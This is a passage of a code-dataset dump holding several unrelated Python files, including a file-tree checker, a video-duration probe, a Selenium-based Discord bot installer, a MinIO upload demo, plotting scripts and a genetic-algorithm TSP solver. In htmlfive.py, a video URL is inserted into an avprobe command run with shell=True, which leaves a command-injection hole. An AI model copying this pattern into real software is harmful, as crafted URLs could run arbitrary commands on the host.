identifier.\n Will be used to aggregate data on files/directories\n with the same identifier across the repeating file structure.\n \"\"\"\n path = Path(path)\n if prefix_file_with_parent_directory and path.is_file():\n identifier = f\"{self.get_identifier(path.parent)}/\"\n else:\n identifier = \"\"\n\n if path.is_file():\n match = re.search(self.file_expression, path.name)\n elif path.is_dir():\n match = re.search(self.directory_expression, path.name)\n elif not self.check_file:\n match = re.search(self.file_expression, path.name)\n else:\n raise TypeError(f\"Path is not a file nor a directory: {path}\")\n\n # When the entire name is filtered out, we prefer using a identifier\n # that is maybe too unique over an empty one\n identifier += path.name if match is None else match.group(0)\n return identifier\n\n def get_identifier_tree(\n self, path: str | Path, parent: SmartPath | None, tree: FileTree\n ) -> str:\n if parent is not None:\n parent_identifier = parent.identifier\n parent_template = tree.get_template(parent_identifier)\n templates = parent_template.children(tree._templates)\n\n else:\n templates = tree._templates\n for template in templates:\n if template == \"\":\n continue\n regex = self.parse_string_to_regex(template.unique_part)\n match = re.match(regex, path.name)\n if match is not None and match[0] != \"\":\n return template\n return path.name\n\n def get_identifier_tree_old(self, path: str | Path, tree: FileTree):\n for key in tree.template_keys():\n if key == \"\":\n continue\n template = tree.get_template(key)\n regex = self.parse_string_to_regex(template.unique_part)\n match = re.match(regex, path.name)\n if match is not None and match[0] != \"\":\n return key\n return path.name\n\n def parse_string_to_regex(self, string):\n string = re.sub(r\"\\{.*?\\}\", \".+\", string)\n string = re.sub(r\"\\[(.*?)\\]\", r\"(?:\\1)?\", string)\n return string\n\n def get_identifier_template(\n self, path: str | Path, templates: list[str], prefix_file_with_parent_directory: bool = True\n ):\n for template in templates:\n if template[2] == \"\":\n continue\n if (\n prefix_file_with_parent_directory\n and Path(path).is_file()\n and template[1] is not None\n ):\n identifier = f\"{template[1]}/{template[0]}\"\n else:\n identifier = f\"{template[0]}\"\n regex = self.parse_string_to_regex(identifier)\n actual = (\n f\"{path.parent.name}/{path.name}\"\n if prefix_file_with_parent_directory and path.is_file()\n else path.name\n )\n match = re.match(regex, actual)\n if match is not None and match[0] != \"\":\n return template[2]\n return path.name\n","repo_name":"neurodatascience/file_tree_check","sub_path":"file_tree_check/identifierEngine.py","file_name":"identifierEngine.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"6367536002","text":"import sys, os, re, signal\nfrom subprocess32 import Popen, PIPE, TimeoutExpired, CalledProcessError\nfrom videos.types.base import VideoType\n\nimport logging\nlogger= logging.getLogger(__name__)\n\ndef getDurationFromStreams(streams):\n # this tries to get around most known cases\n # of duration set with issues in headers\n data = {}\n durations = set()\n index = None\n for line in streams.splitlines():\n index_m = re.match(r\"index=(\\w+)\", line)\n if index_m:\n index = index_m.group(1)\n data[index] = {}\n duration_m = re.match(r\"duration=(\\w+)\", line)\n if duration_m and index:\n duration = duration_m.group(1)\n try:\n data[index][\"duration\"]=int(float(duration))\n except ValueError:\n pass\n codec_m = re.match(r\"codec_name=(\\w+)\", line)\n if codec_m and index:\n codec = codec_m.group(1)\n data[index][\"codec\"]=codec\n codec_type_m = re.match(r\"codec_type=(\\w+)\", line)\n if codec_type_m and index:\n codec_type = codec_type_m.group(1)\n data[index][\"codec_type\"]=codec_type\n frames_m = re.match(r\"nb_frames=(\\w+)\", line)\n if frames_m and index:\n frames = frames_m.group(1)\n try:\n data[index][\"frames\"]=int(frames)\n except:\n pass\n for key, val in data.items():\n if \"duration\" in val and val[\"duration\"] > 0 and \"codec\" in val and val[\"codec\"] != \"unknown\":\n if not (\"frames\" in val and\n \"codec_type\" in val and\n (val[\"codec_type\"] == \"video\") and\n ((val[\"frames\"] / 25 / val[\"duration\"] > 1.1) or (val[\"frames\"] / 25 / val[\"duration\"] < 0.9))):\n durations.add(val[\"duration\"])\n if len(durations) == 1:\n return durations.pop()\n return None\n\nclass HtmlFiveVideoType(VideoType):\n abbreviation = 'H'\n name = 'HTML5'\n\n valid_extensions = set(['ogv', 'ogg', 'mp4', 'm4v', 'webm'])\n\n @classmethod\n def matches_video_url(cls, url):\n return cls.url_extension(url) in cls.valid_extensions\n\n def get_direct_url(self, prefer_audio=False):\n return self.url\n\n def set_values(self, video, user, team, video_url):\n cmd = \"\"\"avprobe -v error -show_format -show_streams \"{}\" 2>&1 \"\"\".format(self.url)\n try:\n with Popen(cmd, shell=True, stdout=PIPE, preexec_fn=os.setsid) as process:\n try:\n streams = process.communicate(timeout=10)[0]\n except TimeoutExpired:\n os.killpg(process.pid, signal.SIGINT) # send signal to the process group\n raise\n duration = getDurationFromStreams(streams)\n video.duration = duration\n except CalledProcessError as e:\n logger.error(\"CalledProcessError error({}) when running command {}\".format(e.returncode, cmd))\n except TimeoutExpired as e:\n logger.error(\"TimeoutExpired error when running command {}\".format(cmd))\n except:\n logger.error(\"Unexpected error({}) when running command {}\".format(sys.exc_info()[0], cmd))\n","repo_name":"jasonboulware/Tardigrades","sub_path":"TestAutomation/project/unisubs/apps/videos/types/htmlfive.py","file_name":"htmlfive.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"37607468952","text":"dr = (-1, 0, 1, 0)\ndc = (0, 1, 0, -1)\n\n\ndef start(depth, v, string: str):\n global possible_nums\n\n if depth == 7:\n possible_nums.append(string)\n return\n\n row = v[0]\n col = v[1]\n string += G[row][col]\n\n for d in range(4):\n n_row = row + dr[d]\n n_col = col + dc[d]\n\n if 0 <= n_row < 4 and 0 <= n_col < 4:\n start(depth+1, (n_row, n_col), string)\n\n\nfor tc in range(int(input())):\n G = [tuple(map(str, input().split())) for _ in range(4)]\n\n possible_nums = []\n for r in range(4):\n for c in range(4):\n start(0, (r, c), '')\n\n print('#{} {}'.format(tc+1, len(set(possible_nums))))\n # break\n","repo_name":"HBell11/TIL","sub_path":"algorithm/SWEA/D4/2819_grid_numbering.py","file_name":"2819_grid_numbering.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41424396036","text":"import time\nimport os\nimport selenium\nimport discord\nimport simple_colors\nfrom sys import platform\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n\n#fa la aplicazione di discord\nglobal drivers\n\ndef installazioneABC():\n\n #controlla o installa le dipendenze\n os.system(\"pip install --upgrade pip\")\n os.system(\"pip install discord\")\n os.system(\"pip install selenium==4.0.0a1\")\n os.system(\"pip install simple_colors==0.1.5\")\n\n nomeBot = input(\"che nome vuoidare al bot? \")\n print()\n print(\"credenziali per discord developer portal:\")\n inputUsername = input(\"metti il tuo username discord: \")\n inputPassword = input(\"metti la tua password discord: \")\n print()\n\n if platform == \"linux\":\n locazioneInstallazione = os.getcwd()\n locazioneDriverS = locazioneInstallazione.split(\"\\\\\")\n locazioneDriverS.remove(\"installazione\")\n locazioneDriverS.append(\"programma\")\n locazioneDriverS.append(\"geckodriver.exe\")\n a = len(locazioneDriverS)\n a = a - 1\n i = 0\n driverL = \"\"\n c = \"\"\n while i < a:\n c = str(locazioneDriverS[i])\n driverL = driverL + c + \"\\\\\"\n i = i + 1\n driverL = driverL + \"geckodriver\"\n driver = webdriver.Firefox(executable_path=driverL)\n os.system(\"clear\")\n elif platform == \"win32\" or platform == \"win64\":\n locazioneInstallazione = os.getcwd()\n locazioneDriverS = locazioneInstallazione.split(\"\\\\\")\n locazioneDriverS.remove(\"installazione\")\n locazioneDriverS.append(\"programma\")\n locazioneDriverS.append(\"geckodriver.exe\")\n a = len(locazioneDriverS)\n a = a - 1\n i = 0\n driverL = \"\"\n c = \"\"\n while i < a:\n c = str(locazioneDriverS[i])\n driverL = driverL + c + \"\\\\\"\n i = i + 1\n driverL = driverL + \"geckodriver.exe\"\n driver = webdriver.Firefox(executable_path=driverL)\n\n driver.get(\"https://discord.com/login?redirect_to=%2Fdevelopers%2Fapplications\")\n\n #login\n input1 = driver.find_element_by_xpath('/html/body/div/div[2]/div/div[2]/div/div/form/div/div/div[1]/div[3]/div[1]/div/div[2]/input')\n input2 = driver.find_element_by_xpath('/html/body/div/div[2]/div/div[2]/div/div/form/div/div/div[1]/div[3]/div[2]/div/input')\n inputInvio = driver.find_element_by_xpath('/html/body/div/div[2]/div/div[2]/div/div/form/div/div/div[1]/div[3]/button[2]')\n\n input1.send_keys(inputUsername)\n input2.send_keys(inputPassword)\n inputInvio.click()\n\n time.sleep(1000)\n #ultimo messaggio\n driver.close()\n print(\"\"\"\ninstallazione finita!\n\nper avviare il tuo bot d'ora in poi ti basterà avviare il file .exe che si è creato nel desktop\n \"\"\")\n\ninstallazioneABC()","repo_name":"berta00/multi-function-discord-bot","sub_path":"installazione/installazione.py","file_name":"installazione.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37135002661","text":"import sys, math\n\n\ndef read_testdata(testname):\n testdata = dict()\n with open(testname, 'r') as testfile:\n for line in testfile:\n items = line.rstrip('\\n').split()\n row = int(items[0])\n col = int(items[1])\n rat = float(items[2])\n testdata[(row, col)] = rat\n return testdata\n\ndef write_traindata(inname, outname, testdata):\n with open(outname, 'w') as outfile:\n with open(inname, 'r') as infile:\n for line in infile:\n items = line.rstrip('\\n').split()\n row = int(items[0])\n col = int(items[1])\n if (row, col) not in testdata:\n outfile.write(line)\n \n#----------------------------------------------------------------\n\nif __name__ == '__main__':\n testname = 'data/testdata.txt'\n inname = 'data/sample1m.txt'\n outname = 'data/train/sample1m.txt'\n\n testdata = read_testdata(testname)\n\n\n \n","repo_name":"wangxu724/RecommendationSysSpark","sub_path":"itembased/update_training_data.py","file_name":"update_training_data.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9948794730","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.ticker as ticker\n#import random\n\n#data = pd.read_csv('topk100.csv')\ndata = pd.read_csv('IMC10100.csv')\n##固定k=1000,内存从10-100 的性能,最小堆的后50kb画图\n# x = data.iloc[:,0:1]\n# print(set(x))\n\nkeys1=[\"CuckooSketch\",\"CuckooSketchPro\"]\nkeys2=[\"CuckooCounter\",\"heavykeeper\",\"LossyCounting\",\"spacesaving\",\"NI\",\"SAL\"]\nlabels={\"CC\":\"CuckooCounter\",\"CS\":\"CuckooSkeCch\",\"CSP\":\"CuckooSketchPro\",\"HK\":\"heavykeeper\",\"LC\":\"LossyCounting\",\"SS\":\"spacesaving\",\"NI\":\"NI\",\"SAL\":\"SAL\"}\ntick_size=9\nlabel_size=10\ndefault_colors = [\"#1f77b4\", \"#ff7f0e\", \"#2ca02c\", \"#d62728\", \"#9467bd\", # 使用颜色编码定义颜色\n \"#8c564b\", \"#e377c2\", \"#7f7f7f\", \"#bcbd22\", \"#17becf\"]\nzipf=0\nAAE = {}\nARE = {}\nthroughput = {}\nPrecsion = {}\nfor index, row in data.iterrows():\n key = str(row[1])\n if key not in AAE:\n AAE[key] = []\n ARE[key] = []\n throughput[key] = []\n Precsion[key] = []\n AAE[key].append(row[3])\n ARE[key].append(row[4])\n throughput[key].append(row[6])\n Precsion[key].append(int(row[5].split('/')[1]) - int(row[5].split('/')[0]))\n\noffset = 0.2 # 定义标记之间的偏移量\nmarkers = ['o', '>', '^', 'v', 'X', 'd', 's', '*', 'h', 'H', 'D', 'd', 'P']\nplt.figure(figsize=(6, 4.5))\n\nax1 = plt.subplot(221)\nplt.grid(True, linestyle='--', axis='y')\nplt.grid(True, linestyle='--', axis='x')\ni = 0\nxtick=[]\ndata={}\ndata[\"CuckooCounter\"]=[]\ndata[\"CuckooSketch\"]=[]\ndata[\"CuckooSketchPro\"]=[]\ndata[\"heavykeeper\"]=[]\ndata[\"LossyCounting\"]=[]\ndata[\"spacesaving\"]=[]\nms=5\nmem = [\"10\",\"20\",\"30\",\"40\",\"50\",\"60\",\"70\",\"80\",\"90\",\"100\"]\n#mem = [\"100\",\"200\",\"300\",\"400\",\"500\",\"600\",\"700\",\"800\",\"900\",\"1000\"]\nfor i, (key, value) in enumerate(AAE.items()):\n if key in keys1: \n x = np.arange(len(value)) + i * offset # 计算当前折线的横坐标点\n ax1.plot(x,value, '-o', label=key, marker=markers[i], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n else:\n j=5\n if key in keys2: \n xx = np.arange(len(value)) + j # 计算当前折线的横坐标点\n ax1.plot(xx,value,'-o', label=key, marker=markers[j], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n continue\nplt.title('Top-k=1000', fontweight='bold', fontsize=label_size)\nplt.xticks(range(len(mem)), mem)\nplt.ylabel('AAE', fontweight='bold', fontsize=label_size)\nplt.grid(True, linestyle=':', color='gray')\nplt.xlabel(u'Memory(KB)', fontweight='bold', fontsize=label_size)\nax1.set_ylim(10**-3, 10**3)\nax1.set_yscale('log')\n#plt.tight_layout()\n\ni = 0\nax2 = plt.subplot(222)\nplt.grid(True, linestyle='--', axis='y')\nplt.grid(True, linestyle='--', axis='x')\nfor i, (key, value) in enumerate(ARE.items()):\n if key in keys1: \n x = np.arange(len(value)) + i * offset # 计算当前折线的横坐标点\n ax2.plot(x,value, '-o', label=key, marker=markers[i], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n else:\n j=5\n if key in keys2: \n xy = np.arange(len(value)) + j # 计算当前折线的横坐标点\n ax2.plot(xy,value,'-*', label=key, marker=markers[j], markersize=ms,linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n continue\nplt.title('Top-k=1000',fontweight='bold', fontsize=label_size)\nplt.tight_layout()\nplt.xlabel(u'Memory(KB)', fontweight='bold', fontsize=label_size)\nplt.ylabel('ARE', fontweight='bold', fontsize=label_size)\nplt.xticks(range(len(mem)), mem)\nplt.grid(True, linestyle=':', color='gray')\nax2.set_ylim(10**-5, 10**3)\nax2.set_yscale('log')\n\nax3 = plt.subplot(223)\nplt.grid(True, linestyle='--', axis='y')\nplt.grid(True, linestyle='--', axis='x')\ni = 0\nfor i, (key, value) in enumerate(throughput.items()):\n if key in keys1: \n x = np.arange(len(value)) + i * offset # 计算当前折线的横坐标点\n ax3.plot(x,value, '-o', label=key, marker=markers[i], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n else:\n if key in keys2: \n xx = np.arange(len(value)) + 5 # 计算当前折线的横坐标点\n ax3.plot(xx,value,'-o', label=key, marker=markers[5], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n continue\nplt.ylabel(u'throughput(Mps)', fontweight='bold', fontsize=label_size) \nplt.title(u'Top-k=1000', fontweight='bold', fontsize=label_size) \nplt.xticks(range(len(mem)), mem)\nplt.xlabel(u'Memory(KB)', fontweight='bold', fontsize=label_size)\nplt.grid(True, linestyle=':', color='gray')\n\nax4 = plt.subplot(224)\nplt.grid(True, linestyle='--', axis='y')\nplt.grid(True, linestyle='--', axis='x')\ni = 0\nfor i, (key, value) in enumerate(Precsion.items()):\n if key in keys1: \n x = np.arange(len(value)) + i * offset # 计算当前折线的横坐标点\n ax4.plot(x,value, '-o', label=key, marker=markers[i], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n else:\n if key in keys2: \n xx = np.arange(len(value)) + 5 # 计算当前折线的横坐标点\n ax4.plot(xx,value,'-o', label=key, marker=markers[5], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n continue\nplt.xticks(range(len(mem)), mem)\nplt.ylabel(u'precision', fontweight='bold', fontsize=label_size) \nplt.title(u'Top-k=1000', fontweight='bold', fontsize=label_size) \nplt.xlabel(u'Memory(KB)', fontweight='bold', fontsize=label_size)\nplt.grid(True, linestyle=':', color='gray')\nplt.legend(labels,bbox_to_anchor=(-0.25,2.6),ncol=8, loc='upper center',borderaxespad=0)\nplt.subplots_adjust(wspace=0.4,hspace=0.4,bottom=0.075)\n##子图间距\nplt.show()\n","repo_name":"lotus6969/cuckoosektch","sub_path":"topk100.py","file_name":"topk100.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17770217351","text":"\"\"\"\nFormat the data into *FastText training data format\n\"\"\"\nimport sys\nsys.path.append(\"..\")\nimport config\nimport random\n\ndef addLable (filein_pos, filein_neg, fileout):\n fpos = open(filein_pos, encoding='utf-8', mode='r')\n fneg = open(filein_neg, encoding='utf-8', mode='r')\n fout = open(fileout, encoding='utf-8', mode='w')\n pos_label = \"__label__helpful \"\n neg__label = \"__label__unhelpful \"\n text_list = []\n for line in fpos:\n text_list.append(pos_label+line)\n for line in fneg:\n text_list.append(neg__label+line)\n random.shuffle(text_list)\n for line in text_list:\n fout.write(line)\n\n\nif __name__ == \"__main__\":\n posfile = \"../data/raw/wyppos.txt\"\n negfile = \"../data/raw/wypneg.txt\"\n outfile = \"../data/train/wyp_test.txt\"\n addLable(filein_pos=posfile,\n filein_neg=negfile,\n fileout=outfile)\n","repo_name":"WangYipeng0624/helpfulness_prediction","sub_path":"data_prep/data_format.py","file_name":"data_format.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8925139435","text":"from minio import Minio\nfrom minio.error import S3Error\nimport json\ndef get_cred(path):\n file_path = path\n with open(file_path, 'r') as j:\n data = json.load(j)\n #print(data)\n return data\ndef main():\n bucket_name = \"python-test\"\n minio_cred = get_cred('./minio_cred/credentials.json')\n # minio config\n clinet = Minio(\n minio_cred['url'].split('//')[1],\n access_key = minio_cred['accessKey'],\n secret_key = minio_cred['secretKey'],\n secure = False\n )\n \n found = clinet.bucket_exists(bucket_name)\n if not found:\n bucket_name = \"new-python\"\n clinet.make_bucket(bucket_name)\n \n else:\n print(f\"Bucket {bucket_name} is existed !\")\n \n #create hello.txt\n txt_path = './demo.txt'\n with open(txt_path, 'w') as f:\n f.write('hello minio!')\n \n # put hello.txt\n clinet.fput_object(\n bucket_name, \"demo/here_is_test.txt\", txt_path\n )\n\nif __name__ == \"__main__\":\n #my_json = get_cred('./minio_cred/credentials.json')\n #print(my_json['url'])\n #print(my_json['url'].split('//'))\n #print(\"*\"*40)\n #for k, v in my_json.items():\n # print(f\"key:{k}, value:{v}\")\n try: \n main()\n except S3Error as exc:\n print(\"error occurred.\", exc)","repo_name":"hubertchang417/minio-python","sub_path":"minio_test.py","file_name":"minio_test.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1977967104","text":"import numpy as np\nimport math\nimport random\nimport matplotlib.pyplot as plt\nimport csv\n\n\ndef CalDis(a, b): # 计算两点之间的距离\n distance = math.sqrt((float(a[1]) - float(b[1])) ** 2 + (float(a[2]) - float(b[2])) ** 2)\n return distance\n\n\ndef CityDis(): # 邻接矩阵:城市间相互距离\n with open('E:\\\\xuexi\\\\二年级\\\\最优化\\\\cities.csv', 'r') as f: # 读入csv文件\n reader = csv.reader(f)\n global locs\n locs = list(reader) # 转成列表类型\n del locs[0] # 去掉表头\n # print(locs)\n\n n = len(locs)\n dis_mat = np.zeros([10, 10])\n for i in range(n - 1):\n for j in range(i + 1, n):\n dist = CalDis(locs[i], locs[j])\n dis_mat[i, j] = dist\n\n for i in range(n):\n dis_mat[:, i] = dis_mat[i, :]\n\n return dis_mat\n\n\n# 交叉\ndef Cross(p1, p2):\n a = np.array(p1).copy()\n b = np.array(p2).copy()\n\n # 0~9之间随机生成两个整数,作为映射的起始点和结束点\n begin = random.randint(0, 9)\n end = random.randint(0, 9)\n # 使 begin 小于 end\n if begin > end:\n temp = begin\n begin = end\n end = temp\n\n # print begin,end\n # 建立映射关系\n cross_map = {}\n is_exist = False\n # 初步映射\n for i in range(begin, end + 1):\n if a[i] not in cross_map.keys():\n cross_map[a[i]] = []\n if b[i] not in cross_map.keys():\n cross_map[b[i]] = []\n\n cross_map[a[i]].append(b[i])\n cross_map[b[i]].append(a[i])\n\n # 计算子串中元素出现的个数,个数为2,则该元素为传递的中间结点,如如1:[6],6:[3,1],‘6’出现的次数为2\n appear_times = {}\n for i in range(begin, end + 1):\n if a[i] not in appear_times.keys():\n appear_times[a[i]] = 0\n if b[i] not in appear_times.keys():\n appear_times[b[i]] = 0\n\n appear_times[a[i]] += 1\n appear_times[b[i]] += 1\n\n if a[i] == b[i]:\n appear_times[a[i]] -= 1\n\n for k, v in appear_times.items():\n if v == 2:\n values = cross_map[k]\n for key in values:\n cross_map[key].extend(values)\n cross_map[key].append(k)\n cross_map[key].remove(key)\n cross_map[key] = list(set(cross_map[key]))\n\n # 使用映射关系交叉\n # 先映射选中的子串\n temp = a[begin:end + 1].copy()\n a[begin:end + 1] = b[begin:end + 1]\n b[begin:end + 1] = temp\n\n # 根据映射规则映射剩下的子串\n seg_a = a[begin:end + 1]\n seg_b = b[begin:end + 1]\n\n remain = list(range(begin))\n remain.extend(range(end + 1, len(a)))\n\n for i in remain:\n keys = cross_map.keys()\n if a[i] in keys:\n for fi in cross_map[a[i]]:\n if fi not in seg_a:\n a[i] = fi\n break\n\n if b[i] in keys:\n for fi in cross_map[b[i]]:\n if fi not in seg_b:\n b[i] = fi\n break\n\n return a, b\n\n\n# 变异\ndef Variation(s):\n c = range(10)\n index1, index2 = random.sample(c, 2)\n temp = s[index1]\n s[index1] = s[index2]\n s[index2] = temp\n return s\n\n\n# 计算总路程,根据路程计算适应度\ndef total_dis(s):\n citydis = CityDis()\n n = len(s)\n dis = 0\n for i in range(n):\n dis += citydis[s[i], s[(i + 1) % n]]\n return -dis\n\n\n# 获取列表的第三个元素\ndef TakeThird(elem): # 按适应度从大到小,排序时作为sort的key参数\n return elem[2]\n\n\ndef CacAdap(population): # adap n*4,n为行数,每行包括:个体下标,适应度,选择概率,累积概率\n\n # 计算每一个个体的适应度,选择概率\n adap = []\n psum = 0\n # 计算适应度\n i = 0\n for p in population:\n icost = np.exp(total_dis(p)) # e^(-x)\n psum += icost\n # 添加个体下标\n adap.append([i])\n # 添加适应度\n adap[i].append(icost)\n i += 1\n # 计算选择概率\n for p in adap:\n # 添加选择概率和累积概率,这里累积概率暂时等于选择概率,后面会重新计算赋值\n p.append(p[1] / psum)\n p.append(p[2])\n\n # 根据适应度从大到小排序\n adap.sort(key=TakeThird, reverse=True)\n # 计算累计概率\n n = len(adap)\n for i in range(1, n):\n p = adap[i][3] + adap[i - 1][3]\n adap[i][3] = p\n\n return adap\n\n\ndef Chose(adap): # 轮盘选择\n\n chose = []\n # 选择次数\n epochs = 20\n n = len(adap)\n for a in range(epochs):\n p = random.random()\n if adap[0][3] >= p:\n chose.append(adap[0][0])\n else:\n for i in range(1, n):\n if adap[i][3] >= p and adap[i - 1][3] < p:\n chose.append(adap[i][0])\n break\n\n chose = list((chose))\n return chose\n\n\ndef Cross_Variation(chose, population): # 交叉变异\n\n # 交叉率\n p_c = 0.7\n # 变异率\n p_m = 0.3\n # 交叉变异操作\n chose_num = len(chose)\n sample_times = chose_num // 2\n for i in range(sample_times):\n index1, index2 = random.sample(chose, 2)\n # print index1,index2\n # 参与交叉的父结点\n parent1 = population[index1]\n parent2 = population[index2]\n # 这两个父结点已经交叉,后面就不要参与了,就像这两个人以及结婚,按规矩不能在与其他人结婚了,故从采样样本中移除\n chose.remove(index1)\n chose.remove(index2)\n\n p = random.random()\n if p_c >= p:\n child1, child2 = Cross(parent1, parent2)\n # print child1,child2\n p1 = random.random()\n p2 = random.random()\n if p_m > p1:\n child1 = Variation(child1)\n if p_m > p2:\n child2 = Variation(child2)\n population.append(list(child1))\n population.append(list(child2))\n return population\n\n\ndef GA(population): # 1次遗传过程\n\n adap = CacAdap(population)\n # 选择操作\n chose = Chose(adap)\n # 交叉变异\n population = Cross_Variation(chose, population)\n\n return population\n\n\n# 循环调用遗传算法,直到达到终止条件\ndef find_min(population):\n distance = []\n # 遗传次数\n epochs = 51\n i = 0\n x_final = []\n y_final = []\n while i < epochs:\n adap = []\n # 计算适应度\n for p in population:\n icost = total_dis(p)\n adap.append(icost)\n\n # 使用遗传算法更新种群\n population = GA(population)\n\n min_cost = max(adap)\n print('epoch %d: distance=%.2f' % (i, -min_cost))\n distance.append([i, -min_cost])\n i += 1\n BestPath = []\n if i == epochs:\n # 输出最优解\n p_len = len(population)\n for index in range(p_len):\n if adap[index] == min_cost:\n print('最优路径:')\n # print(population[index])\n cities = []\n for pos in population[index]:\n BestPath.append(pos)\n cities.append(locs[pos][0])\n x_final.append(locs[pos][1])\n y_final.append(locs[pos][2])\n print(cities)\n print('最短距离:')\n print(-min_cost)\n break\n # 打印损失函数变换\n distance = np.array(distance)\n plt.subplot(1, 2, 1)\n x_final = [float(x) for x in x_final]\n y_final = [float(x) for x in y_final]\n x_final.append(x_final[0])\n y_final.append(y_final[0])\n plt.plot(x_final, y_final, '*-')\n plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签\n for i in range(len(BestPath)): # 标记端点\n plt.text(float(locs[BestPath[i]][1]), float(locs[BestPath[i]][2]), locs[BestPath[i]][0])\n plt.subplot(1, 2, 2)\n plt.plot(distance[:, 0], distance[:, 1])\n plt.title('GA')\n plt.show()\n\n\n# 初始化\ns1 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]\ns2 = [8, 5, 9, 1, 3, 4, 6, 0, 2, 7]\n\npopulation = [s1, s2]\n# 调用\nfind_min(population)\n","repo_name":"weiyongsen/optimization","sub_path":"Gene_TSP.py","file_name":"Gene_TSP.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39198291979","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 10 12:41:42 2019\r\n\r\n@author: Chaobo\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\nimport yolo.config as cfg\r\nimport time\r\nimport pickle as cPickle\r\nimport skimage.draw\r\nfrom yolo.yolo3_net_pos import YOLONet\r\nfrom utils.voc_eval_mask import voc_eval\r\n\r\nclass MAP(object):\r\n \r\n def __init__(self, test_path, evaluation=True):\r\n self.num_class = len(cfg.CLASSES)\r\n self.classid = [i for i in range(self.num_class)]\r\n self.class_to_ind = dict(zip(cfg.CLASSES, range(self.num_class)))\r\n self.test_path = test_path\r\n self.imagesetfile = os.path.join(self.test_path, 'cache', 'test.txt')\r\n if evaluation: \r\n self.groundtruth = self.get_groundtruth()\r\n\r\n def get_groundtruth(self):\r\n cache_path = cache_path = os.path.join(self.test_path, 'cache')\r\n \r\n test_labels_cache = os.path.join(cache_path, 'gt_labels_' + 'test' + '.pkl')\r\n if os.path.isfile(test_labels_cache):\r\n print('Loading testing labels from: ' + test_labels_cache)\r\n with open(test_labels_cache, 'rb') as f:\r\n recs = cPickle.load(f)\r\n print('Number of testing data: ' +str(len(recs[0])))\r\n return recs \r\n\r\n ground_truth_cache = os.path.join(cache_path, 'ground_truth_cache.pkl')\r\n print('Processing testing labels from: ' + ground_truth_cache)\r\n with open(ground_truth_cache, 'rb') as f:\r\n annotations = cPickle.load(f)\r\n \r\n # annotations. Skip unannotated images.\r\n annotations = [a for a in annotations if a['regions']]\r\n \r\n with open(self.imagesetfile, 'r') as f:\r\n test_index = [x.strip() for x in f.readlines()] \r\n assert len(test_index)==len(annotations)\r\n \r\n recs_mask = {}\r\n recs_mergemask = {}\r\n recs_size = {}\r\n for i, index in enumerate(test_index):\r\n a = annotations[i]\r\n filename = os.path.splitext(a['filename'])[0]\r\n assert filename == index\r\n \r\n polygons = [r['shape_attributes'] for r in a['regions'].values()]\r\n class_names = [r['region_attributes'] for r in a['regions'].values()]\r\n\r\n # return a list[{'imageid':filename, 'classid':classid, 'difficult':int(0), 'mask':bool[image_h, image_w]]}]\r\n image_h, image_w = a['size']\r\n mask_label, merged_mask = self.load_masklabel(filename, image_h, image_w, polygons, class_names)\r\n \r\n recs_mask[index] = mask_label\r\n recs_mergemask[index] = merged_mask\r\n recs_size[index] = [image_h, image_w]\r\n \r\n recs = [recs_mask, recs_mergemask, recs_size, test_index]\r\n\r\n print('Saving testing labels to: ' + test_labels_cache)\r\n with open(test_labels_cache, 'wb') as f:\r\n cPickle.dump(recs, f)\r\n print('Number of testing data: ' +str(len(recs_mask)))\r\n return recs\r\n\r\n def load_masklabel(self, imname, image_h, image_w, polygons, class_names):\r\n\r\n mask = np.zeros([len(polygons), image_h, image_w], dtype=np.bool)\r\n merged_annotatemask = np.zeros((image_h, image_w), dtype=np.uint8)\r\n \r\n for i, each_instance in enumerate(polygons):\r\n each_mask = np.zeros([image_h, image_w], dtype=np.bool)\r\n for each_poly in each_instance:\r\n subtype = each_poly['type']\r\n x_points = each_poly['all_points_x']\r\n y_points = each_poly['all_points_y']\r\n rr, cc = skimage.draw.polygon(y_points, x_points)\r\n if subtype == 'out': \r\n each_mask[rr, cc] = True\r\n each_mask[np.array(y_points), np.array(x_points)] = True\r\n else:\r\n each_mask[rr, cc] = False\r\n each_mask[np.array(y_points), np.array(x_points)] = True\r\n \r\n mask[i, :,:] = each_mask\r\n\r\n # generate merged mask for computing mIoU\r\n if class_names[i] == 'crack':\r\n merged_annotatemask[mask[i,...]==True] = 1\r\n elif class_names[i] == 